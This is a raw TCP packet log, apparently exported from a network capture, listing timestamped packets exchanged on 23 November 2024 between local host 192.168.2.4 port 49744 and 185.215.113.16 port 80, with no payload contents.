                                                                                                                                                                                                Nov 23, 2024 16:53:32.064385891 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.064415932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.065236092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.065371990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.065428972 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.065797091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.065887928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.065944910 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.066545963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.066602945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.066641092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.067275047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.067370892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.067436934 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.068351030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.068408012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.068430901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.068723917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.068779945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.068831921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.069626093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.069679022 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.069736958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.070561886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.070622921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.070666075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.070940018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.071063042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.071118116 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.071983099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.072037935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.072066069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.072432995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.072523117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.072592020 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.073156118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.073211908 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.073263884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.074258089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.074397087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.074486017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.074624062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.074697971 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.074748039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.075664997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.076076984 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078361988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078378916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078393936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078408957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078417063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078419924 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078430891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078448057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078464031 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078480959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078496933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078500032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.078557014 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.079407930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.079444885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.079469919 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.079890013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.079938889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.079945087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.081003904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.081127882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.081190109 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.081387997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.081456900 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.081502914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.082094908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.085314989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226335049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226358891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226375103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226433039 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226444960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226499081 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226526022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226542950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226557970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.226586103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.227241993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.227302074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.227304935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.227325916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.227375031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.227426052 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228049040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228101015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228117943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228121042 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228168011 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228183985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228816032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228866100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228892088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228908062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228926897 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.228972912 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.229646921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.229706049 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.229716063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.229732990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.229783058 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.229909897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.230480909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.230518103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.230535030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.230597019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.230623960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.230643034 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.231200933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.231241941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.231255054 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.231259108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.231342077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.231393099 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.231978893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232033968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232040882 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232053995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232182026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232254982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232775927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232832909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232836008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232852936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232898951 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.232930899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.233654976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.233730078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.233752012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.233782053 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.233807087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.233831882 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.234467983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.234524012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.234550953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.234571934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.234595060 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.234639883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.235166073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.235213041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.235229969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.235272884 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.235302925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.235311031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.235959053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236015081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236020088 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236032009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236093044 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236105919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236732960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236792088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236808062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236865044 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236898899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.236905098 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.237517118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.237592936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.237608910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.237649918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.237689972 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.237729073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.238305092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.238367081 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.238384962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.238403082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.238464117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.238481045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.239104986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.239151001 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.239166975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.239207983 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.239243031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.239248037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.239976883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.239994049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240010023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240035057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240051985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240065098 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240689993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240741968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240758896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240822077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240859985 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.240880966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.241473913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.241524935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.241545916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.241564035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.241626024 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.241642952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.242266893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.242328882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.242346048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.242377996 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.242408991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.242430925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243066072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243117094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243124008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243134975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243190050 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243231058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243858099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243916988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243933916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243957043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.243993998 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.244013071 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.244658947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.244712114 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.244766951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.244784117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.244800091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.244833946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.245431900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.245477915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.245480061 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.245495081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.245572090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.245621920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.246241093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.246289015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.246294975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.246311903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.246351957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.246401072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437190056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437419891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437434912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437469006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437491894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437495947 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437509060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437525034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437541008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437561989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.437591076 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.438175917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.438221931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.438236952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.438288927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.438359976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.438410997 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.438966036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439034939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439050913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439090014 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439208984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439256907 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439750910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439804077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439821005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.439847946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.440015078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.440079927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.440547943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.440592051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.440608025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.440654993 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.440915108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.440987110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.441354990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.441380024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.441395044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.441442013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.441494942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.441544056 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442154884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442174911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442195892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442212105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442226887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442250013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442910910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442933083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.442948103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.443002939 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.443080902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.443130016 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:32.443717003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:32.443773031 CET8049744185.215.113.16192.168.2.4
